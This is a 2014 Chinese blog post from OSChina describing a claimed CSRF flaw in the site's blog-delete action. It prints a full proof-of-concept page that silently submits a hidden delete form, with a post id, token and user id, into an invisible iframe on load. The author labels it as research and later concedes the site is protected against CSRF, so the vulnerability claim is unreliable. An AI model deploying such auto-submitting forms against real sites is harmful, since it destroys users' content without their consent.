文档章节

oschina删除文章的csrf漏洞

牛哥哥
 牛哥哥
发布于 2014/02/17 22:10
字数 212
阅读 149
收藏 0

学习用,不得用于损害oschina用户的利益


csrf是一种常见且危害较大的网络攻击行为

文章来源: http://yangsui.me/oschina-csrf-2.html

已经证明我文章描述有误,oschina是防csrf工具的


我的blog编辑器有的问题,贴的代码被转义了,大家如果查看代码不方面,可以看看我下面的代码,只是几个参数不同,其它完全一样。

  

<html>
	<head>
		<script>
			function submitform(){
				document.getElementById("form1").submit()
			}
		</script>
	</head>
	<body onload="submitform()">
		<h1>Delete content from csrf</h1>
		<form id="form1" action="http://my.oschina.net/action/blog/delete" method="post" target="hiddenframe">
			<input type="hidden" name="id" value="200555" />
			<input type="hidden" name="user_code" value="2jOugKBiY0rm9TxYZiV1LvMOfZBQvuZpJpappXiV" />
			<input type="hidden" name="user" value="166550">
		</form>
		<iframe frameborder="0" height="0" width="0" name="hiddenframe"></iframe>
	</body>
</html>

 

  还是那句话,用于研究技术,不作它途

   

© 著作权归作者所有

上一篇: java io InputSteam
下一篇: about golang
牛哥哥
粉丝 2
博文 8
码字总数 1984
作品 0
大渡口
高级程序员
私信 提问
加载中

评论(1)

Yashin
Yashin
oschina 是不能获取他人用户的user_code 的,除非账号已经被黑掉0
ThinkSAAS开源社区2.0版本发布下载

下载地址: http://file.thinksaas.cn/down/thinksaas2.0.zip ThinkSAAS2.0更新内容: Version 2.0 新增功能 . 增加后台用户留言管理 . 增加后台消息管理 . 增加淘贴管理,完善帖子专辑功能 ...

ThinkSAAS
2013/10/09
4.3K
13
phpMyAdmin 4.7.x CSRF 漏洞利用

phpMyAdmin是个知名MySQL/MariaDB在线管理工具,phpMyAdmin团队在4.7.7版本中修复了一个危害严重的CSRF漏洞(PMASA-2017-9),攻击者可以通过诱导管理员访问恶意页面,悄无声息地执行任意SQL...

ambulong2
2018/06/12
0
0
网站漏洞修复之CSRF跨站攻击

CSRF通俗来讲就是跨站伪造请求攻击,英文Cross-Site Request Forgery,在近几年的 网站安全威胁排列中排前三,跨站攻击利用的是网站的用户在登陆的状 态下,在用户不知不觉的 情况下执行恶意...

网站安全
2018/06/09
0
0
网站漏洞修复与防护之CSRF跨站攻击

CSRF通俗来讲就是跨站伪造请求攻击,英文Cross-Site Request Forgery,在近几年的 网站安全威胁排列中排前三,跨站攻击利用的是网站的用户在登陆的状态下,在用户不知不觉的 情况下执行恶意代...

网站安全者
2018/06/09
0
0
WordPress 5.1:从CSRF到RCE

译文声明 本文是翻译文章,文章原作者ripstech,文章来源:blog.ripstech.com 原文地址:https://blog.ripstech.com/2019/wordpress-csrf-to-rce/ 译文仅供参考,具体内容表达以及含义原文为...

qdlimit
03/16
0
0

没有更多内容

加载失败,请刷新页面

加载更多

反编译9.png图片还原

本文链接:https://blog.csdn.net/a1140778530/article/details/10528507 经常反编译apk文件找资源,9.png的文件处理起来很麻烦。 最近使用Ant自动编译打包app时,从别处搜罗来的9.png文件导...

shzwork
26分钟前
6
0
Shell脚本应用 – for、while循环语句

一、for循环语句 在实际工作中,经常会遇到某项任务需要多次执行的情况,而每次执行时仅仅是处理的对象不一样,其他命令相同。例如:根据通讯录中的姓名列表创建系统账号等情况。 当面对各种...

linux-tao
26分钟前
5
0
RPA风潮下企业财务工作模式的变革

RPA(机器人流程自动化)在财务领域的应用,正给企业财务带来前所未有的改变。 前RPA时代,财务领域面临的痛点 在RPA机器人应用之前,企业财务工作进程的推进,主要通过财务人员人工操作或信...

UiBot
31分钟前
5
0
Hive之命令行修改表注释

最近遇到一个需求,在不重建表的情况下,修改表的注释,hive有没有类似关系型数据库的SQL命令来修改呢,找了下,亲测有效,如下List-1 List-1 hive>use your_schemahvie>ALTER TABLE tabl...

克虏伯
31分钟前
5
0
是什么,它的作用是什么

在HTML文档的首部往往会有这么一句话<!DOCTYPE html>,许多时候我们忽视了它的存在,它实际上是一个声明,告诉浏览器用哪种HTML版本的规范来解读HTML文档。 尽管我们不给出这句声明浏览器照样...

前端老手
37分钟前
4
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部